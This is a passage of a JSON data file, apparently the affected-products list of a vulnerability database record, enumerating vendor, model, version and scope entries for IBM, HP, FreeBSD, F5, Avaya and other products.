0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.4" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2227916" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.33" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.9" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8804259" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x37508752" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "insight control server provisioning", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.0" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36307158" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3.2" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408737" }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.01" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x32502583" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x31002582" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 